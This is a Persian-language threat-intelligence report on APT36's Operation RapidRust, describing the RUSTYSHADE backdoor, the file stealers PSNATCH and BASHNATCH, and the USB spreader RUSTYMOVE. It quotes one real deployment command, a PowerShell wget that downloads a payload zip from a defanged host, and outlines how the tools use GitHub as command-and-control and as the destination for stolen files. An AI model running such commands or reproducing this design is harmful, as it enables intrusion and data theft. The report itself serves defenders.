در آگوست ۲۰۲۶، گروه تهدید APT36 که به پاکستان مرتبط است، فعالیتهای جدیدی را در کمپینی به نام Operation RapidRust آغاز کرد. این گروه به حملات خود علیه سازمانهای دولتی و دفاعی در هند و افغانستان ادامه داده و تاکتیکها، تکنیکها و روشهای خود را بهروزرسانی کرده است. شرکت Zscaler ThreatLabz در تحقیقات خود ابزارهای بدافزار جدید و فعالیتهای پس از نفوذ قابل توجهی را کشف کرده است. این ابزارهای جدید شامل درب پشتی RUSTYSHADE، ابزار پس از نفوذ RUSTYMOVE و ابزارهای سرقت فایل PSNATCH و BASHNATCH میباشند.
RUSTYSHADE
RUSTYSHADE یک درب پشتی جدید مبتنی بر زبان Rust است که برای ارتباطات فرمان و کنترل (C2) از مخازن خصوصی GitHub تحت کنترل مهاجم استفاده میکند و ارتباطات C2 را با استفاده از AES-256-GCM رمزگذاری میکند. این ابزار در سیستمهای آلوده با استفاده از دستور زیر مستقر میشود:
powershell wget https://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip -o ww.zip
RUSTYSHADE از API REST GitHub به عنوان کانال C2 استفاده میکند و پیامها را با استفاده از AES-256-GCM رمزگذاری میکند. این ابزار از فایلهای مشخصی در مخزن خصوصی GitHub برای همگامسازی ارتباطات استفاده میکند.
PSNATCH و BASHNATCH
PSNATCH یک ابزار سرقت فایل مبتنی بر PowerShell است که فایلها را از ماشینهای آلوده به مخازن خصوصی GitHub مهاجم منتقل میکند. این ابزار فایلهایی را که در ۱۲۰ روز گذشته تغییر کردهاند و دارای پسوندهای مشخصی هستند، جمعآوری میکند. BASHNATCH نسخه لینوکس این ابزار است که به همان شیوه عمل میکند.
RUSTYMOVE
RUSTYMOVE یک ابزار سبکوزن برای انتشار بدافزار از طریق رسانههای قابل جابجایی (مانند USB) است که فایلهای مخرب از پیش آماده شده را به درایوهای خارجی متصل به سیستمهای آلوده کپی میکند. این ابزار به عنوان یک مؤلفه حرکت جانبی عمل میکند و هیچگونه قابلیت رمزگذاری یا ارتباط با زیرساختهای C2 مبتنی بر شبکه ندارد.
گروه APT36 با استفاده از این ابزارها و تکنیکها سعی در نفوذ به شبکههای ایزوله و گسترش بدافزار خود دارد. برای مقابله با این تهدیدات، توصیه میشود که سازمانها سیستمهای خود را بهروز نگه داشته و از ابزارهای امنیتی مناسب استفاده کنند.






